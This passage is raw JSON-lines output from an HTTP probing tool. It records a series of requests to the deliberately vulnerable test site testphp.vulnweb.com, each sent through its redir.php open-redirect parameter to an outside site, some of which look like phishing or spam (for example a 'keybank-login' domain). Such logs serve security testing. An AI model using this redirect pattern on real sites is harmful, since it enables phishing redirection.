p://testphp.vulnweb.com/redir.php?r=http://justplangrow234.blogspot.com/\",\"location\":\"http://justplangrow234.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://justplangrow234.blogspot.com/\",\"time\":\"356.772955ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:33.904472346Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow234.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow234.blogspot.com/management.html\",\"location\":\"http://justplangrow234.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://justplangrow234.blogspot.com/management.html\",\"time\":\"351.237731ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:34.019310146Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow566.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow566.blogspot.com/\",\"location\":\"http://justplangrow566.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://justplangrow566.blogspot.com/\",\"time\":\"356.228006ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:37.175774591Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow566.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://justplangrow566.blogspot.com/management.html\",\"location\":\"http://justplangrow566.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://justplangrow566.blogspot.com/management.html\",\"time\":\"342.69528ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:37.372042429Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kangendomino.club/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kangendomino.club/\",\"location\":\"http://kangendomino.club/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kangendomino.club/\",\"time\":\"342.310882ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:37.434041363Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kaomoji.ciao.jp/htmllint/htmllint.cgi?ViewSource=on;URL=https://www.hadehana.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kaomoji.ciao.jp/htmllint/htmllint.cgi?ViewSource=on;URL=https://www.hadehana.com\",\"location\":\"http://kaomoji.ciao.jp/htmllint/htmllint.cgi?ViewSource=on\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kaomoji.ciao.jp/htmllint/htmllint.cgi?ViewSource=on;URL=https://www.hadehana.com\",\"time\":\"352.827738ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:37.475194118Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://katastargeoprofilmk.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://katastargeoprofilmk.blogspot.com/\",\"location\":\"http://katastargeoprofilmk.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://katastargeoprofilmk.blogspot.com/\",\"time\":\"345.007242ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:37.873489022Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://katastargeoprofilmk.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://katastargeoprofilmk.blogspot.com/management.html\",\"location\":\"http://katastargeoprofilmk.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://katastargeoprofilmk.blogspot.com/management.html\",\"time\":\"352.019188ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:38.279484513Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kentfaliju.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kentfaliju.blogspot.com/\",\"location\":\"http://kentfaliju.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kentfaliju.blogspot.com/\",\"time\":\"346.645109ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:38.304267635Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kentfaliju.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kentfaliju.blogspot.com/management.html\",\"location\":\"http://kentfaliju.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kentfaliju.blogspot.com/management.html\",\"time\":\"343.220425ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:38.484960867Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keybank-login.info\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keybank-login.info\",\"location\":\"http://keybank-login.info\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keybank-login.info\",\"time\":\"351.465752ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:39.030459303Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardandmousecoza.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardandmousecoza.blogspot.com/\",\"location\":\"http://keyboardandmousecoza.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardandmousecoza.blogspot.com/\",\"time\":\"347.262876ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:39.073973536Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardandmousecoza.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardandmousecoza.blogspot.com/management.html\",\"location\":\"http://keyboardandmousecoza.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardandmousecoza.blogspot.com/management.html\",\"time\":\"344.392474ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:40.790691727Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardclassescoin.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardclassescoin.blogspot.com/\",\"location\":\"http://keyboardclassescoin.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardclassescoin.blogspot.com/\",\"time\":\"356.23859ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:42.052639334Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardclassescoin.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardclassescoin.blogspot.com/management.html\",\"location\":\"http://keyboardclassescoin.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardclassescoin.blogspot.com/management.html\",\"time\":\"339.47744ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:42.104418169Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardcompru.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardcompru.blogspot.com/\",\"location\":\"http://keyboardcompru.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardcompru.blogspot.com/\",\"time\":\"338.174534ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:42.450534548Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardcompru.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardcompru.blogspot.com/management.html\",\"location\":\"http://keyboardcompru.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardcompru.blogspot.com/management.html\",\"time\":\"352.587578ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.269994681Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardherodk.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardherodk.blogspot.com/management.html\",\"location\":\"http://keyboardherodk.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardherodk.blogspot.com/management.html\",\"time\":\"342.317581ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.289410033Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardstylishcoza.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardstylishcoza.blogspot.com/\",\"location\":\"http://keyboardstylishcoza.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardstylishcoza.blogspot.com/\",\"time\":\"344.124524ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.35323144Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardstylishcoza.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardstylishcoza.blogspot.com/management.html\",\"location\":\"http://keyboardstylishcoza.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardstylishcoza.blogspot.com/management.html\",\"time\":\"345.758215ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.356342517Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardwarriorcoza.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardwarriorcoza.blogspot.com/\",\"location\":\"http://keyboardwarriorcoza.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardwarriorcoza.blogspot.com/\",\"time\":\"343.00179ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.671066947Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardwarriorcoza.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardwarriorcoza.blogspot.com/management.html\",\"location\":\"http://keyboardwarriorcoza.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardwarriorcoza.blogspot.com/management.html\",\"time\":\"352.481066ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.737349443Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardwarriorscoza.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardwarriorscoza.blogspot.com/\",\"location\":\"http://keyboardwarriorscoza.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardwarriorscoza.blogspot.com/\",\"time\":\"344.154179ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.73778803Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardwarriorscoza.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://keyboardwarriorscoza.blogspot.com/management.html\",\"location\":\"http://keyboardwarriorscoza.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://keyboardwarriorscoza.blogspot.com/management.html\",\"time\":\"338.676796ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.821621688Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kidsonkeyboardlucenapage.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kidsonkeyboardlucenapage.blogspot.com/\",\"location\":\"http://kidsonkeyboardlucenapage.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kidsonkeyboardlucenapage.blogspot.com/\",\"time\":\"352.107607ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.845826953Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kidsonkeyboardlucenapage.blogspot.com/management.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kidsonkeyboardlucenapage.blogspot.com/management.html\",\"location\":\"http://kidsonkeyboardlucenapage.blogspot.com/management.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kidsonkeyboardlucenapage.blogspot.com/management.html\",\"time\":\"343.381825ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.945551196Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kimdlo.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kimdlo.blogspot.com\",\"location\":\"http://kimdlo.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kimdlo.blogspot.com\",\"time\":\"344.176622ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:43.993584617Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kimdlo.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kimdlo.blogspot.com/\",\"location\":\"http://kimdlo.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kimdlo.blogspot.com/\",\"time\":\"351.941613ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:44.057630458Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kochamserialecda.blogspot.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kochamserialecda.blogspot.com/\",\"location\":\"http://kochamserialecda.blogspot.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kochamserialecda.blogspot.com/\",\"time\":\"352.486707ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:44.124282285Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kozackieseriale.blogspot.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kozackieseriale.blogspot.com\",\"location\":\"http://kozackieseriale.blogspot.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kozackieseriale.blogspot.com\",\"time\":\"360.951129ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:44.182192474Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kozackifilm.wordpress.com\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kozackifilm.wordpress.com\",\"location\":\"http://kozackifilm.wordpress.com\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kozackifilm.wordpress.com\",\"time\":\"339.184174ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:44.26265276Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://krovlya.dp.ua/index.php?subaction=userinfo\\u0026user=evykoby\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://krovlya.dp.ua/index.php?subaction=userinfo\\u0026user=evykoby\",\"location\":\"http://krovlya.dp.ua/index.php?subaction=userinfo\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://krovlya.dp.ua/index.php?subaction=userinfo\\u0026user=evykoby\",\"time\":\"355.824205ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:44.364188785Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://kydaoquan.com/f25b13f\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://kydaoquan.com/f25b13f\",\"location\":\"http://kydaoquan.com/f25b13f\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://kydaoquan.com/f25b13f\",\"time\":\"343.09308ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:47.530428703Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://lavrus.org/inostrancy-ustremilis-v-rossiju-2.html\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://lavrus.org/inostrancy-ustremilis-v-rossiju-2.html\",\"location\":\"http://lavrus.org/inostrancy-ustremilis-v-rossiju-2.html\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://lavrus.org/inostrancy-ustremilis-v-rossiju-2.html\",\"time\":\"352.522314ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:47.728686989Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://litclubbs.ru/redirect?url=https://www.dino-es.com/\",\"input\":\"http://testphp.vulnweb.com/redir.php?r=http://litclubbs.ru/redirect?url=https://www.dino-es.com/\",\"location\":\"http://litclubbs.ru/redirect?url=https://www.dino-es.com/\",\"scheme\":\"http\",\"webserver\":\"nginx/1.19.0\",\"content_type\":\"text/html\",\"method\":\"GET\",\"host\":\"44.228.249.3\",\"path\":\"/redir.php?r=http://litclubbs.ru/redirect?url=https://www.dino-es.com/\",\"time\":\"354.369262ms\",\"a\":[\"44.228.249.3\"],\"tech\":[\"Nginx:1.19.0\",\"PHP:5.6.40\",\"Ubuntu\"],\"words\":1,\"lines\":1,\"status_code\":302,\"failed\":false,\"knowledgebase\":{\"PageType\":\"other\",\"pHash\":0}}\n{\"timestamp\":\"2024-11-13T02:29:47.777043705Z\",\"port\":\"80\",\"url\":\"http://testphp.vulnweb.com/redir.php?r=http://livebettingo4e.fredsgivingday.com/bet-online-for-tips-1971/\",\"input\":\"http://testphp.vulnweb.co